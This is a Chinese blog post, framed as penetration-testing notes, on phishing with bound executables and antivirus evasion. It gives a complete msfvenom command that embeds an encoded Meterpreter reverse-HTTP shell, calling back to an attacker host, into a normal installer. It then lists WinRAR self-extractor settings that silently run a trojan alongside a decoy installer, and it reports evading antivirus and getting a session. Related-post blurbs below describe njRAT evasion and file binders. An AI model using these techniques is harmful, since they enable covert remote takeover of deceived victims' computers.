【渗透测试笔记】之【钓鱼姿势——exe捆绑与免杀】

最新推荐文章于 2024-08-05 17:47:43 发布
最新推荐文章于 2024-08-05 17:47:43 发布
阅读量5.8k 收藏 43
点赞数 2
分类专栏: 渗透测试 社工 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/118525837
版权
渗透测试 同时被 3 个专栏收录
72 篇文章 25 订阅
订阅专栏
免杀
5 篇文章 2 订阅
订阅专栏
社工
3 篇文章 2 订阅
订阅专栏

msfvenom捆绑

缺点:不免杀。

  1. 准备被捆绑程序:
    在这里插入图片描述

  2. 输入:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe
    在这里插入图片描述

  3. 目标主机执行,成功上线:
    在这里插入图片描述

自解压捆绑

  1. 下载WinRAR
  2. 选中正常文件inst.exe和木马文件360installer.exe,并添加到压缩文件:
    在这里插入图片描述
  3. 常规-点击创建自解压格式压缩文件-改名(注意先勾选再改名):
    在这里插入图片描述
  4. 高级-自解压选项-解压路径:C:\windows\temp
    在这里插入图片描述
  5. 设置-解压后运行:
    在这里插入图片描述
  6. 模式-全部隐藏
    在这里插入图片描述
  7. 更新-解压并更新文件&覆盖所有文件:
    在这里插入图片描述
    点击确认之后成功创建自解压文件:
    在这里插入图片描述
    修改图标后(图标修改方法):
    在这里插入图片描述
  8. 静态查杀:
    在这里插入图片描述
  9. 运行后动态查杀通过,成功上线,并且此时正常运行安装程序起到迷惑效果:
    在这里插入图片描述
    在这里插入图片描述
AA8j
关注
专栏目录
吾爱EXE文件捆绑打包机(文件捆绑机)V18.8.18 免费版.rar
02-08
exe文件捆绑,来自网络
exe文件捆绑器(可设置图标志)
07-23
向大家推荐一款非常好用的一个文件捆绑器,非常好用.完全傻瓜式.
简单的免杀方法(基本知识)
最新发布
2301_77472496的博客
08-05 1008
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后。
绕过杀软(二)——免杀exe文件(360、火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
linux之shell 输入输出
cuichangzhi5476的博客
01-24 171
如果希望创建一个新文件,并向其中输入一些内容,只需使用cat命令把标准输出重定向到该文件中,这时cat命令的输入是标准输入—键盘,你输入一些文字,输入完毕后按< C T R L - D >结束输入。这真是一个非常简单...
捆绑exe文件
老裴
12-11 2663
启动前先启动 Calc.exe, 改一下, 用 Explorer.exe 也可以。 代码:--------------------------------------------------------------------------------#define UNICODE#define _UNICODE                          #include #include
exe捆绑工具
05-20
exe捆绑工具,可以把两个exe文件合并在一起,一个前台运行,一个后台运行
捆绑机的作用是将两个exe文件捆绑在一起,执行文件捆绑
03-22
捆绑机的作用是将两个exe文件捆绑在一起,捆绑成功后生成的新文件的图标,将采用你选择的第一个程序的图标。当你运行捆绑后的新程序时,该程序将按你捆绑的秩序,先后执行你所捆绑在一起的两个文件,这样的伪装性就很强了。在此公布捆绑机的目的是让大家知道程序是可以捆绑在一起的,大家以后在执行别人给你的文件的时候千万要小心,不要以为是你熟悉的程序就认为是安全的,因为别人很可能将病毒或木马捆绑在了一起。
渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 402
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
python之渗透测试笔记(一)
01-20
python之渗透测试(一)—— Socket模块Socket模块须知简介基本用法使用Socket编写一个简单的服务端和客户端 Socket模块须知 在TCP/IP协议族中,Socket并不是协议,而是一个编程接口。 TCP/IP是传输层协议,主要解决...
将两个exe文件进行捆绑,并有同步、异步两种执行方式
06-19
将两个exe文件捆绑,并有同步、异步两种执行方式
EXE文件捆绑机,源代码基于VC++
03-17
内容索引:VC/C++源码,文件操作,EXE,捆绑  EXE文件捆绑机,源代码基于VC++,可以将两个EXE文件捆绑在一起,有意思吧,你知道两个EXE文件捆绑在一起会发生什么吗?那就试试吧,很有趣!~
感染全盘EXE文件免杀捆绑
06-26
感染全盘EXE文件免杀捆绑器感染全盘EXE文件免杀捆绑器感染全盘EXE文件免杀捆绑器感染全盘EXE文件免杀捆绑器感染全盘EXE文件免杀捆绑器感染全盘EXE文件免杀捆绑
EXE文件捆绑打包机(源码).rar
03-11
EXE文件捆绑打包机(源码).rar
exe捆绑工具.rar
12-28
两个EXE程序合并成一个 基于易语言开发 。 没什么高深的难度 , 基于字节集操作。 有需要的可以下载来看看。
渗透测试笔记——收集于网络
08-05
渗透测试笔记的开始部分明确提示,所有渗透测试活动应在本地复现,严禁非法行为。这也反映了渗透测试的伦理规范,即在进行渗透测试时,必须尊重法律法规,保护用户和组织的利益,并确保测试活动不会对现实环境产生...
渗透测试学习笔记之案例二.pdf
04-06
渗透测试学习笔记
Python学习笔记——大数据之Spark简介与环境搭建
02-24
SparkSQL:提供通过ApacheHive的SQL变体Hive查询语言(HiveQL)与Spark进行交互的API。每个数据库表被当做一个RDD,SparkSQL查询被转换为Spark操作。对熟悉Hive和HiveQL的人,Spark可以拿来就用。SparkStrea
渗透测试笔记本电脑推荐
07-28
根据引用\[1\],Kali Linux是一个以安全为核心理念的操作系统,它预装了大量的渗透测试软件,并且在硬件方面也有了很大的提升,支持大量的桌面环境。因此,如果你想购买一台渗透测试笔记本电脑,推荐选择一台能够运行Kali Linux的设备。你可以选择一台配置较高的笔记本电脑,以确保它能够满足运行Kali Linux和其他渗透测试工具的要求。此外,根据引用\[2\],SecLists是一份非常有用的列表集,可以帮助渗透测试员快速完成任务,因此你可以将其作为参考资源。另外,根据引用\[3\],OWASP ZAP是一款应用测试工具,适合应用安全新手使用。因此,你可以考虑在渗透测试笔记本电脑上安装OWASP ZAP,以帮助你进行应用测试。 #### 引用[.reference_title] - *1* [最受欢迎的14款渗透测试工具](https://blog.csdn.net/yangwenxue_admin/article/details/93978894)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [18款好用的网络安全渗透测试工具推荐](https://blog.csdn.net/2201_75362610/article/details/129241378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值